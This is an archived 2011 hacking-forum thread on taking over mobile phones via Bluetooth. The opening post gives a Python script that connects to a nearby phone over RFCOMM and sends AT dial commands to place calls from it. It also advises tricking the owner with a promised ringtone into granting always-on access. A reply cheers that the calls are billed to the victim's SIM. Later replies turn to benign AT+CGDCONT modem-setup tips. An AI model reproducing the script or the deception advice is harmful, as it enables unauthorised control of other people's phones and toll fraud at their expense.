EvilZone
Hacking and Security => Mobile Hacking => : drago November 10, 2011, 02:24:19 PM
-
hacking mobile phone over Bluetooth is quit a heavy task.
three things are needed for it.
- knowledge about Bluetooth network.
- A series of AT commands on which the radio network work.
- how to get control over the phone....
i am a python programmer so the program i will show over python.
but first thing first i.e to know how bluetooth network work.
for this you can visit ove link http://electronics.howstuffworks.com/bluetooth2.htm (http://electronics.howstuffworks.com/bluetooth2.htm)
secondly knowin AT command on which radio network work.This can
be found on the NET or you can download and read the book
Telit_AT_Commands_Reference_Guide from the link
http://www.grupoitech.com.br/controle/enviadas/download/wireless/telit-atcommandsreferenceguider1220110919112643.pdf (http://www.grupoitech.com.br/controle/enviadas/download/wireless/telit-atcommandsreferenceguider1220110919112643.pdf)
here is a simple python program to make a call from mobile device
from your pc.
from bluetooth import *
near=discover_devices()
print near
count=0
for s in near:
print count+1,":",lookup_name(s)
count=count+1
n=int(input("choose your device index"))
c=BluetoothSocket(RFCOMM)
c.connect((near[n-1],1))
while(1):
str=raw_input("number you want to call")
str="ATD +91"+str+";\r"
c.send(str)
print c.recv(100)
print c.recv(100)
print c.recv(100)
this program is run with python 2.6 interpreater and
bluz extention
the last about gaining access.Actually I have not found
any method to gain the access with out user notice. The
best thing i do is i promise the user of phone to give
a good ringtone or something like that and turn on always acceses
mode.
if any one knows any beter way to gain access without notice
then please inform me soon.Oviously we can do many more
only you need to know more of those AT commands and their
uses...
-
Not sure what was the point of this. Looks like semi-tutorial'ish post :P
But I would like to know as well how can Bluetooth be exploited on newer phones.
-
i have used some software for bluetooth hack, but every one of them also require authentication from victim phone.
but once you get it you are all good to go then. every thing will be in your control,
even if you call from your phone, balance will be deducted from his/her sim card. :D
not axactly you are calling from your phone, but you are using victim mobile to call over bluetooth.
don't know that much about AT command.
but, i always have to use it when i try to connect internet on lapto using my samsung mobile.
i have to type this command
AT+CGDCONT=1,"IP","APN NAME"
this command just use given apn directly insted of looking in your mobile profile.
-
well, this reminds me to share some thing.
If any body using internet via GPRS.
and if you are getting error of ppp link control,
then you can try giving this command
AT+CGDCONT=1,"IP","APN NAME"
in modem setting.
control panel-->phone and modem-->modems-->select your modem---->advance
and type above command. just keep ip as it is and use your actual apn name insted of "APN NAME"
look at refrence pic as i am using it in my laptop.
(http://i41.tinypic.com/148i61y.png)
-
I don't know about the AT command, thanks for the command reference. The Python is helpful too.
AT+CGDCONT=1,"IP","APN NAME"
in modem setting.
control panel-->phone and modem-->modems-->select your modem---->advance
and type above command. just keep ip as it is and use your actual apn name insted of "APN NAME"
That is sweet :) I'll definitely have to learn how to use AT
-
Not sure what was the point of this. Looks like semi-tutorial'ish post :P
But I would like to know as well how can Bluetooth be exploited on newer phones.
i am new in this field and site don't what we need to post i have shared only the information i had and the way i have programed to hack mobile....
-
well, this reminds me to share some thing.
If any body using internet via GPRS.
and if you are getting error of ppp link control,
then you can try giving this command
AT+CGDCONT=1,"IP","APN NAME"
in modem setting.
control panel-->phone and modem-->modems-->select your modem---->advance
and type above command. just keep ip as it is and use your actual apn name insted of "APN NAME"
look at refrence pic as i am using it in my laptop.
(http://i41.tinypic.com/148i61y.png)
thanks for the piece of information. ya this is an AT command
AT+CGDCONT is GPRS command for defining Packet Data Protocol(PDP) context